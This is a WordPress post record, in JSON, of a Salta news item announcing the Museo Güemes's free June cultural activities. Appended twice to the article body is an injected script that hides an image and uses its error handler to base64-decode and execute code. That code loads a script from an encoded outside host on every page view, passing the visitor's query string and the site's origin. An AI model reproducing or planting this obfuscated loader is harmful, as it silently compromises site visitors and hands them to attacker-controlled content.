{"id":5242,"date":"2025-06-09T11:11:34","date_gmt":"2025-06-09T14:11:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5242"},"modified":"2025-08-13T23:30:30","modified_gmt":"2025-08-14T02:30:30","slug":"el-museo-guemes-despliega-su-propuesta-cultural-de-junio-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5242","title":{"rendered":"El Museo G\u00fcemes despliega su propuesta cultural de junio en Salta"},"content":{"rendered":"\n<p><strong><em>Actividades gratuitas para toda la comunidad invitan a redescubrir la figura de G\u00fcemes y su legado desde m\u00faltiples lenguajes en Espa\u00f1a 730.<\/em><\/strong><\/p>\n\n\n\n<p>Este lunes 9 de junio a las 10:30 quedar\u00e1 inaugurada en el Centro Cultural Guachipas la muestra \u201cG\u00fcemes Itinerante\u201d, que podr\u00e1 visitarse hasta el 24 de junio de lunes a viernes, de 10:30 a 18:00. Esta propuesta busca extender el alcance del Museo G\u00fcemes m\u00e1s all\u00e1 del casco hist\u00f3rico salte\u00f1o, democratizando el acceso de los salte\u00f1os a sus contenidos. Con el respaldo tecnol\u00f3gico de la Fundaci\u00f3n Capacitar NOA, se recrean las principales experiencias del museo en una versi\u00f3n m\u00f3vil, pensada especialmente para estudiantes de todos los niveles educativos con visitas guiadas y material pedag\u00f3gico para el aula, aunque tambi\u00e9n abierta a todo el p\u00fablico.<\/p>\n\n\n\n<p><strong>El Museo G\u00fcemes despliega su propuesta cultural de junio en Salta<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17696-el-museo-guemes-despliega-su-propuesta-cultural-de-junio-en-salta.webp\" alt=\"\"\/><\/figure>\n\n\n\n<p>Los d\u00edas 9 y 10 de junio, el libro \u201cLos Investigadores de la Independencia\u201d ser\u00e1 llevado a la Escuela N\u00b0 4.007 \u201cMart\u00edn Miguel de G\u00fcemes\u201d, en Av. Belgrano 666. All\u00ed, Patricia Fr\u00edas realizar\u00e1 presentaciones para alumnos de 4\u00ba y 5\u00ba grado, tanto en el turno ma\u00f1ana como en el turno tarde, retomando los ejes del libro y proponiendo una mirada din\u00e1mica sobre el proceso independentista, con foco en la figura de G\u00fcemes y los aportes femeninos en la resistencia norte\u00f1a.<\/p>\n\n\n\n<p>El s\u00e1bado 14 y domingo 15 de junio, de 11 a 19, se llevar\u00e1 a cabo la muestra \u201cGauchos \u2013 El Puntal de la Patria\u201d en el patio escult\u00f3rico del museo. La exposici\u00f3n, organizada por integrantes del Comit\u00e9 de la Tradici\u00f3n de la Sociedad Rural Argentina junto con coleccionistas salte\u00f1os, pondr\u00e1 en valor el papel fundamental del gaucho en las luchas por la independencia y en la construcci\u00f3n de la identidad argentina, a trav\u00e9s de una cuidada selecci\u00f3n de elementos del apero gauchesco. Ambos d\u00edas a las 17 habr\u00e1 charlas abiertas a todo p\u00fablico, a cargo de especialistas que abordar\u00e1n temas de \u00e9poca.<\/p>\n\n\n\n<p>Finalmente, el martes 17 de junio, en conmemoraci\u00f3n de un nuevo aniversario del paso a la inmortalidad del General G\u00fcemes, el Museo abrir\u00e1 sus puertas con entrada libre de 11 a 19. Durante esa jornada, el recorrido habitual ofrecer\u00e1 a los visitantes una experiencia inmersiva sobre la figura del h\u00e9roe nacional, apoyada en recursos audiovisuales y materiales interactivos. Para los m\u00e1s chicos, habr\u00e1 folletos did\u00e1cticos que transformar\u00e1n la visita en una oportunidad l\u00fadica de aprendizaje.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Actividades gratuitas para toda la comunidad invitan a redescubrir la figura de G\u00fcemes y su legado desde m\u00faltiples lenguajes en Espa\u00f1a 730. Este lunes 9 de junio a las 10:30 quedar\u00e1 inaugurada en el Centro Cultural Guachipas la muestra \u201cG\u00fcemes Itinerante\u201d, que podr\u00e1 visitarse hasta el 24 de junio de lunes a viernes, de 10:30 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5243,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-5242","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5242"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5242"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5242\/revisions"}],"predecessor-version":[{"id":6466,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5242\/revisions\/6466"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5243"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}